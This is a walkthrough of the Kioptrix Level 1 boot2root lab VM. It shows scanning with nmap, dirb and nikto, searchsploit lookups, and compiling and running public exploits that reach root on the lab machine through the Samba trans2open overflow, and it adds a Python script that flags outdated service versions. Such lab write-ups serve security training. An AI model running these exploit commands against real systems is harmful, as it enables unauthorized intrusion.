Kioptrix: Level 1 (#1) Vulnhub Walkthrough

So here is another really famous boot2root VM that is called Kioptrix.

Kioptrix VM Image Challenges:
These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49

Filename: Kioptrix_Level_1.rar
File size: 186 MB
MD5: 6DF1A7DFA555A220054FB98BA87FACD4
SHA1: 98CA3F4C079254E6B272265608E7D22119350A37

Format: Virtual Machine (VMware)
Operating System: Linux

Networking:
DHCP service: Enabled
IP address: Automatically assign

I start with netdiscover to find the IP of the machine:

netdiscover -r 192.168.2.0/24

Continuing with nmap to find open ports and the services running on them:

nmap -sV -T4 -O -F --version-light 192.168.2.8
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https?
32768/tcp open  rpcbind
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)

So a web server is running on ports 80 and 443; continuing with dirb for directory enumeration on Apache:

dirb http://192.168.2.8
---- Scanning URL: http://192.168.2.8/ ----
+ http://192.168.2.8/~operator (CODE:403|SIZE:273)
+ http://192.168.2.8/~root (CODE:403|SIZE:269)
+ http://192.168.2.8/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.2.8/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.2.8/manual/
==> DIRECTORY: http://192.168.2.8/mrtg/
==> DIRECTORY: http://192.168.2.8/usage/

We found two users (operator, root) and a few directories.
Nothing interesting in the directories other than software versions that might be vulnerable.
Let's write them down:
mod_ssl 2.8.4
mrtg 2.9.6
webalizer 2.01

Let's also run nikto, because port 80 is always the most interesting:

nikto -h 192.168.2.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.8
+ Target Hostname:    192.168.2.8
+ Target Port:        80
+ Start Time:         2019-01-07 13:08:38 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8345 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2019-01-07 13:10:44 (GMT-5) (126 seconds)
---------------------------------------------------------------------------
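
As an added example that is not part of the original walkthrough, the script below turns the nmap service table above into the kind of "write them down" list automatically: it parses the VERSION column into (product, version) pairs, flags anything below a constructed baseline taken from the "current is at least ..." lines in the nikto output above, and reports banners that name software without any version (Samba here) for manual follow-up. The sample input and the BASELINE table are constructed from this page; version_key keeps only numeric components, so letter-only suffixes such as the "b" in 0.9.6b are ignored.

```python
import re

# Constructed sample input: the nmap -sV service table from the scan above.
NMAP_OUTPUT = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https?
32768/tcp open  rpcbind
"""

# Constructed policy table of minimum acceptable versions, taken from the
# "current is at least ..." lines in the nikto output above (keys are the
# product tokens nmap prints in the VERSION column).
BASELINE = {"httpd": "2.4.12", "mod_ssl": "2.8.31", "OpenSSL": "1.0.1j"}
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
PRODUCT_RE = re.compile(r"([A-Za-z_][\w.-]*?)[ /](\d+(?:\.\d+)+[A-Za-z0-9]*)")  # "mod_ssl/2.8.4", "httpd 1.3.20"

def version_key(v):
    """Numeric components only: '0.9.6b' -> (0, 9, 6), '2.9p2' -> (2, 9, 2)."""
    return tuple(int(x) for x in re.findall(r"\d+", v))

def parse_services(text):
    """Port, service name, banner and (product, version) pairs per nmap line."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if not m:
            continue  # header line or non-port output
        port, _proto, _state, name, banner = m.groups()
        services.append({"port": int(port), "service": name, "banner": banner,
                         "products": PRODUCT_RE.findall(banner or "")})
    return services

def outdated(services, baseline=BASELINE):
    """(port, product, seen version, policy floor) for each product below policy."""
    findings = []
    for svc in services:
        for product, version in svc["products"]:
            floor = baseline.get(product)
            if floor and version_key(version) < version_key(floor):
                findings.append((svc["port"], product, version, floor))
    return findings

def unversioned(services):
    """Banners that name software but no version: these need manual follow-up."""
    return [(s["port"], s["banner"]) for s in services
            if s["banner"] and not s["products"]]
```

Feeding it the real scan instead of the sample is a matter of passing the text of `nmap -sV` output to parse_services; OpenSSH on port 22 is not flagged only because the constructed table has no entry for it.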

Multiple interesting vulnerabilities found, as expected, especially mod_ssl/2.8.4, which is vulnerable to a remote buffer overflow that may allow a remote shell.
Before I get to that, I would also like to try SSH.

I start looking for exploits on SSH:

searchsploit openssh
OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off | exploits/unix/remote/21314.txt
OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token | exploits/linux/remote/21402.txt

Tried 21314 but I didn’t understand how to successfully use it so I moved on.

Now to Apache, before going straight to mod_ssl:

searchsploit apache 1.3

cp /usr/share/exploitdb/exploits/linux/remote/132.c /root/Desktop/apache/

gcc 132.c -o 132

Successfully compiled, with a bunch of notes and warnings.

Created users.txt in the same directory with the enumerated users (operator, root) + me for credits 😛

Let's give execution permissions to the compiled binary and run it with the proper arguments:

chmod +x 132
./132 -t 192.168.2.8 -u users.txt -b

No luck. Something did work as expected I guess. Maybe different configuration on that target machine.

Searched with searchsploit again for mrtg and webalizer, but nothing showed up. Google had some interesting results, but I was all in for Samba now, as that was where I wanted to go.

searchsploit samba 2.2.8

returned awesome results:

------------------------------------------- ----------------------------------------
 Exploit Title                             |  Path
                                           | (/usr/share/exploitdb/)
------------------------------------------- ----------------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Ove | exploits/osx/remote/9924.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remot | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / M | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Rem | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remot | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Co | exploits/linux/remote/55.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Ex | exploits/multiple/remote/10.c
------------------------------------------- ----------------------------------------

So let's use exploits/multiple/remote/10.c:

gcc -o smb 10.c
chmod +x smb
./smb
./smb -b 0 192.168.2.8

Aaaand root!
